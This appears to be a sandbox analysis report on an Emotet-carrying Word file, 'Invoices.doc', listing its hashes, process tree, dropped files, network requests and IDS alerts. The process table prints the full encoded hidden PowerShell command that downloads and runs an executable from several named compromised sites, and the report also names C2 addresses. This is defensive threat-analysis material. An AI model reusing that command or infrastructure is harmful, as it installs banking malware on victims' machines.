File name: | Invoices.doc |
Full analysis: | https://app.any.run/tasks/6fceaab8-8423-4c22-a591-f442c62a1e09 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 16, 2019, 21:28:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Sed et voluptatem., Author: Zoey Schott, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 15:41:00 2019, Last Saved Time/Date: Fri Nov 15 15:41:00 2019, Number of Pages: 1, Number of Words: 19, Number of Characters: 114, Security: 0 |
MD5: | 0EC45367F7E3D89329F808FAE7436A38 |
SHA1: | CC559A1A4FA9309D25B0C27DF77C842B4C663EDB |
SHA256: | E367D90C466EF104ECB98B3A1D5D2FE59BB0ABD27583E67B52E974319B8A3805 |
SSDEEP: | 3072:bluOdH+UaqFh5Br/SzFaSadGBrjC48+WZ/POhh+/iIlaAEmvgkopTXITVL:bluOdHNaqrSzGdD48+aPOnfI5op0t |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Sed et voluptatem. |
---|---|
Subject: | - |
Author: | Zoey Schott |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:11:15 15:41:00 |
ModifyDate: | 2019:11:15 15:41:00 |
Pages: | 1 |
Words: | 19 |
Characters: | 114 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 132 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoices.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4000 | powershell -w hidden -enco JABUAHkAZABzAGEAbgBlAHQAegByAGEAbABzAD0AJwBBAHAAawB1AHIAbwB3AHMAJwA7ACQAWABrAHQAdwB4AGEAYwBsACAAPQAgACcAOQA1ADEAJwA7ACQARwB4AHoAeABwAGYAbQBxAGwAPQAnAFUAYwB6AGsAdQBtAHoAYgBsAHMAJwA7ACQAUgByAHAAbQBlAGwAcABtAGQAbgBvAG8AbAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABrAHQAdwB4AGEAYwBsACsAJwAuAGUAeABlACcAOwAkAFcAawBzAHIAawBoAHcAZgBlAHQAdABnAD0AJwBDAGMAdQB6AGIAdABwAG8AdgBoAHUAaAAnADsAJABPAGMAbQBuAGMAcQBzAGoAeQBiAGgAZQBvAD0ALgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAGMATABpAEUAbgBUADsAJABZAHEAdwBqAHMAYgBlAGkAcABwAGMAPQAnAGgAdAB0AHAAOgAvAC8AZABpAGcAZQBzAHQAeQBuADcALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBGAFcAZAA5AEIAUgAvACoAaAB0AHQAcAA6AC8ALwBjAGkAbgBlAG0AYQBuAGUAdwBzAC4AaQBuAGYAbwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBxAFMAdgBwAHUAcQBrAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AawBvAHMAbQBlAHQAaQBrAGEAcAByAGkAYgByAGEAbQAuAGMAegAvAEAAUgBlAGMAeQBjAGwAZQAvAFMAaQB1AGIAdABSAEgAMQBnAHoALwAqAGgAdAB0AHAAOgAvAC8AbQBhAHcAcQBpADMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA1AHkAYwBzAE0AagBIAFQAeQBRAC8AKgBoAHQAdABwAHMAOgAvAC8AdAB1AHIAawB1AGEAegBoAGEAdgBhAGMAaQBsAGkAawAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaABqAC8AJwAuACIAUwBgAHAAbABJAHQAIgAoACcAKgAnACkAOwAkAFQAeABtAHAAcgBkAGMAbQB4AG8APQAnAE8AaABoAGEAagBzAGMAYQBrAHgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEcAYwBpAGoAYQB3AHIAYQB1ACAAaQBuACAAJABZAHEAdwBqAHMAYgBlAGkAcABwAGMAKQB7AHQAcgB5AHsAJABPAGMAbQBuAGMAcQBzAGoAeQBiAGgAZQBvAC4AIgBEAE8AdwBuAGwAYABvAGEAZABmAEkAYABMAGUAIgAoACQARwBjAGkAagBhAHcAcgBhAHUALAAgACQAUgByAHAAbQBlAGwAcABtAGQAbgBvAG8AbAApADsAJABRAHcAZABpAG8AawB4AGQAbwBsAD0AJwBIAGUAcABkAHIAcABmAGcAeAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFIAcgBwAG0AZQBsAHAAbQBkAG4AbwBvAGwAKQAuACIATABlAE4AZwBgAFQAaAAiACAALQBnAGUAIAAzADQAOAAzADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGAAQQByAHQAIgAoACQAUgByAHAAbQBlAGwAcABtAGQAbgBvAG8AbAApADsAJABIAHYAeQBiAGUAcwBhAHcAcQA9ACcAVgBhAHUAeABtAHEAeQB1AGMAdgB6AHQAZQAnADsAYgByAGUAYQBrADsAJABKAHUAcgB6AHAAdwByAHYAYgB0AG0AdwB5AD0AJwBRAHEAaABmAHUAZAB4AHIAcwBxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAbQBoAGIAdAB4AGYAagBmAGUAcgBrAGMAPQAnAFQAZABhAHUAegB5AHIAZQBpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1560 | "C:\Users\admin\951.exe" | C:\Users\admin\951.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3824 | --e3b69773 | C:\Users\admin\951.exe | 951.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3532 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 951.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1268 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA860.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4000 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MWQTL08VMD5NI8EKPWT1.temp | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61C24ED9.wmf | wmf | |
MD5:E861BBA1549CB72E2A4CDC2CCFA6E587 | SHA256:3CCC82E556CFB694A2BB26FC6DC850D57A8B4FB4613762F681013C08CE02B18E | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BFA551A.wmf | wmf | |
MD5:8330E76EEF89CD22D483DBE91C04F7F1 | SHA256:928A1D977B2C932F516641819E361ACB294711C0E28DB2EFFB64BF8CFC0D9BC8 | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:1639E7A75CEB367F88D7CE1D2BC352B9 | SHA256:FD221D24788CDB481D79724A46F8BD66BC052DEBF8529A91A3F422CC5497AB2E | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C4143D.wmf | wmf | |
MD5:B2650C5447C9D5B125EBFFE47214C115 | SHA256:206F500DC30B49A0F88A96F00EAAFAA14ABEF9A71D8F90AE7164B6F37D73D2D6 | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C34C1DDD839C2A0232FC5E3F81A8AFDF | SHA256:9294C8C13A505FBABE20E846186AA03AD23D0A8728B641B98C23D2EBFCD8DC60 | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2928AE53.wmf | wmf | |
MD5:E79F510F46B60D762F9BEFCAE9B7561D | SHA256:043FCA7568FE3AE0C53F9BC7E60C981D15A6C3D73EE6D442DF97BC924EBD5780 | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$voices.doc | pgc | |
MD5:44221E796EEB3EF80DDDA3B2C6D9BF5D | SHA256:F2CFAC825B02C8C85E76AECD662BA4DB6A28A99B70BD9328F674FE8265D61F6A | |||
4000 | powershell.exe | C:\Users\admin\951.exe | executable | |
MD5:D28403ECEA469B395C350E759BE69080 | SHA256:68FA7B153D1FEF8FA7FDBCE97316CDD5CACD6B4999923DC061EA5D6AE372D519 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4000 | powershell.exe | GET | — | 148.72.57.207:80 | http://digestyn7.com/cgi-bin/FWd9BR/ | US | — | — | suspicious |
4000 | powershell.exe | GET | 404 | 45.14.227.17:80 | http://cinemanews.info/wp-content/qSvpuqk/ | unknown | html | 12.2 Kb | unknown |
4000 | powershell.exe | GET | 200 | 77.48.200.144:80 | http://www.kosmetikapribram.cz/@Recycle/SiubtRH1gz/ | CZ | executable | 240 Kb | suspicious |
1268 | serialfunc.exe | POST | 200 | 65.23.154.17:8080 | http://65.23.154.17:8080/publish/ | US | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4000 | powershell.exe | 77.48.200.144:80 | www.kosmetikapribram.cz | Liberty Global Operations B.V. | CZ | suspicious |
1268 | serialfunc.exe | 65.23.154.17:8080 | — | IO Capital Princess, LLC | US | malicious |
4000 | powershell.exe | 148.72.57.207:80 | digestyn7.com | — | US | suspicious |
4000 | powershell.exe | 45.14.227.17:80 | cinemanews.info | — | — | unknown |
Domain | IP | Reputation |
---|---|---|
digestyn7.com |
| suspicious |
cinemanews.info |
| unknown |
www.kosmetikapribram.cz |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
4000 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4000 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4000 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1268 | serialfunc.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
1268 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |